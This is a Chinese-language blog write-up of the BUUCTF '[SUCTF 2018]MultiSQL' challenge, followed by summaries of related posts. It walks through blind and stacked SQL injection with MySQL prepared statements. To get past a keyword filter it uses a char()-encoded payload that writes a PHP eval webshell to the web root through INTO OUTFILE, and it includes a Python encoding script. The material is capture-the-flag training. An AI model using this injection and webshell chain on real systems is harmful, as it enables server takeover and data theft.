buu-[SUCTF 2018]MultiSQL

最新推荐文章于 2023-12-13 16:23:27 发布
最新推荐文章于 2023-12-13 16:23:27 发布
阅读量270 收藏
点赞数
分类专栏: buuctf-web sql 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qaq517384/article/details/120912678
版权

打开环境,只有登录和注册界面,admin已存在,随便注册一个算了
在这里插入图片描述登录后有两个选项
在这里插入图片描述头像界面就是一个文件上传,象征性的传一张,得到一个文件夹,可以正常访问
在这里插入图片描述
用户信息界面还有url的user/user.php?id=2
很明显的sql注入(如果考点是注入的话)
在这里插入图片描述
看一眼题目,然后默默的吧id改成1,能看到admin但是没有用
在这里插入图片描述
测了一下字符型和整形注入都没回显

脚本不知道为什么没有返回值,浏览器是能成功访问的
在这里插入图片描述?id=1^(ascii(mid(user(),1,1))>0)
就手注了一下user()是suctf@localhost(虽然没什么用)

没思路了就fuzz了一下,这些是能用的符号,函数因为因为语法问题就都没了
在这里插入图片描述
既然分号能用,那么可以尝试堆叠注入

这里卡了一会儿,看了wp发现要用 select str into file 写入shell

set @sql=select ‘<?php eval($_POST[cmd]);?>’ into outfile ‘/var/www/html/favicon/shell1.php’;;prepare stmt from @sql;execute stmt;

select以及一些符号被过滤了
用char()绕过
CHAR()解释每个参数n为整数,并返回由这些给出的字符串的字符的代码整数值。如遇NULL值则跳过

给出一个转ascii的脚本

str="select '<?php eval($_POST[cmd]);?>' into outfile '/var/www/html/favicon/shell1.php';"
for i in str:
     print(ord(i),end=",")

payload

?id=1;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,49,46,112,104,112,39,59);prepare query from @sql;execute query;

可以蚁剑,也可以直接用
在这里插入图片描述拿到文件名直接cat就好了

有点水啊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[SUCTF 2018]MultiSQL-MySQL预处理
qq_61142406的博客
05-26 277
MySQL传统处理: 客户端准备sql语句 发送sql语句到MySQL服务器 MySQL服务器执行sql语句 服务器执行结果返回客户端 预处理基本策略: 将sql语句强制一分为二: 第一部分为前面相同命令和结构部分 第二部分为后面可变数据部分 首先将前面的sql语句发送给MySQL服务器,让其先执行溢出预处理(并没有真正的执行)第一次发送sql语句的时候将其中可变的数据部分都用一个数据占位符来表示,比如问号? 不带参数的预处理 准备预处理语句 prepare 语句名称 from “预处理的sql
BUUCTF:[SUCTF 2018]MultiSQL --- 堆叠注入 -- 预处理-- 编码,10进制,16进制。
Zero_Adam的博客
04-17 705
目录:一、自己做:二、 学到的&&不足:三、学习WP:堆叠注入, 参考:初末 一、自己做: 这里试addslash来的 用户信息中,把反斜线去掉展示的 在注册的用户名进行测试, 将 or , by 空格| 替换成为@。 union select or 都过滤了 ,然后在尝试 异或^ substr也被过滤了,然后尝试mid试可以的, 但是这个不好使啊2^(if(ascii(mid(user(),1,1))>0,0,1))。注册页面不好使,然后就看WP了 二、 学到的&&am
BUUCTF:[SUCTF 2018]MultiSQL
末初的CSDN博客
04-01 2372
BUUCTF:[SUCTF 2018]MultiSQL 两个地方存在漏洞,注册存在二次注入,在登录的时候触发。用户信息?id存在盲注,flag不在数据库当中,需要利用注入getshell 二次注入我没有成功getshell,先看?id,注册一个用户,登入查看信息 ?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入 ...
[SUCTF 2018]MultiSQL
fmyyy1的博客
05-07 735
场景 注册登录 进入用户信息页面。 看到url中多了id参数,修改。 做到这已经知道是sql注入题。测试后知道这里可以异或布尔盲注和堆叠注入,但后面就注不出来了。fuzz后发现过滤了union,select之类的关键字。 参考wp,这里要用预处理写shell。 str="select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';" len_str=len(str) for i in r
[SUCTF 2018]MultiSQL(mysql预编译)
paidx0
07-12 384
[SUCTF 2018]MultiSQL(mysql预编译)
BUUCTF--[SUCTF 2018]MultiSQL
qq_46263951的博客
07-28 406
进入之后是这样的页面,我们先来注册一个帐号 查看用户信息 在?id=后存在一个sql盲注,我们来尝试一下?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入,2异或0还是为2 经过fuzz测试后发现这里过滤了union,select ,&,|,过滤了select然后存在堆叠注入的可以使用预处理注入,尝试写入shell,因为过滤了select等字符,使用char()绕过,需要执行的语句select '<?php eval($_POST[.
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
buu-[SUCTF 2018]annonymous
qaq517384的博客
10-25 242
打开环境就是源码 <?php $MY = create_function("","die(`cat flag.php`);"); $hash = bin2hex(openssl_random_pseudo_bytes(32)); eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();" ."}"); if(isset($_GET['func_name'])){ $_GET["func_name"]();
buu-[CFI-CTF 2018]IntroToPE
qaq517384的博客
04-10 384
解压为一个NET文件 程序为一个检验密码的程序 dnSpy打开,根据按钮搜索相关函数 过一遍发现 Q0ZJey5OZXRDI18xc19AdzNzMG0zfQ== base64解密即可 flag{.NetC#_1s_@w3s0m3}
joinUs-buu2018:h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信qq分享
05-02
joinUs-buu2018 h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信/qq分享 #预览地址
BUUSUCTF 2019 Easysql
小白渣的博客
02-05 3517
呜呜呜~~ ~自己已经好久好久都没有做题和更新博客辽 加上这次的疫情,感jio整个人都要躺发霉辽!!! 下午闲着没事终于开始了做题 打开题目发现是这样的一个页面 第一步还是老样子 先看看源码是什么样子的 应该是发现不了什么东西 我们发现是post 方法传参 我们可以发现 1;show databases; #查库 1;show tables; #查表 可以发现只有一个Flag...
[SUCTF 2018]MultiSQL(预处理)
qq_62046696的博客
12-31 1018
通过命令获得flag ,可能是我做题少吧,第一次 看见sql中采用预处理然后写入webshell,最后得flag,反过来分析,通过上传文件给了一个可读写权限得路径,一步步收集信息,只能说自己太菜了。wp是通过盲注,然后一个个读取user.php的源码,我简单的跑了一下半个小时也跑不出来,所以我觉得这种方法并不太实用。异或可以然后试试,发现呃呃呃应该是过滤了,fuzz发现就剩了几个符号包括分号,想到了堆叠注入分号链接。为什么有写入权限呢,因为文件上传都是传到了这个目录的里面,所以有可写的权限。
[SUCTF 2018]MultiSQL-MySQL预处理学习
cjdgg的博客
05-11 415
[SUCTF 2018]MultiSQL-MySQL预处理学习 进入题目后,注册账户登录 编辑头像可以上传文件,但是上传了php文件还是会变成jpg格式 再看用户信息这里,id=2那里可以随意更改,存在越权,1就是admin 这里接下来要用到MySQL的预处理,参考文章 set MariaDB [(none)]> set @a='select version()'; Query OK, 0 rows affected (0.00 sec) MariaDB [(none)]> select
[SUCTF 2018]MultiSQL MYSQL 预处理写
m0_64180167的博客
12-13 812
然后我们开始fuzz 发现 select ,union 都没了。首先这道题需要预处理写马 之前在ctfshow中学习过预处理。发现可以闭合 所以这里是存在堆叠注入的。这里就实现了绕过 并且执行了命令。首先我们开始判断是否存在注入。所以我们看看能不能写木马。
buuctf-web-[SUCTF 2018]MultiSQL1
mlws1900的博客
03-11 577
flag{1cc63c44-f1b0-40c0-a64e-fdc8bfe4f503}删删改改四五回,哥们只是想混个勋章,太折磨人了,看到我文章有罗里吧嗦的地方见谅,我其他文章都是以精简为主,不在乎文章分数,为了这个勋章,我只好车轱辘话转来转去(这一段就是这个作用)可以读/var/www/html/index.php文件,读取/var/www/html/user/user.php文件(这种方法跑十几分钟也跑不出来)存在各种限制,select,union,直接用char绕过(太菜,用其他绕过写马失败)
2018 SUCTF cycle
ACdream
06-08 505
比赛的时候看到这个题,通过率那么高,然后密钥长度给了提示是1-50,所以猜到了是暴力,太久没做Crypto了,已经忘记了还有维吉尼亚字频统计这一说了……找到了一个好的wp贴出来:https://findneo.tech/180527suctf/#Magic...
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值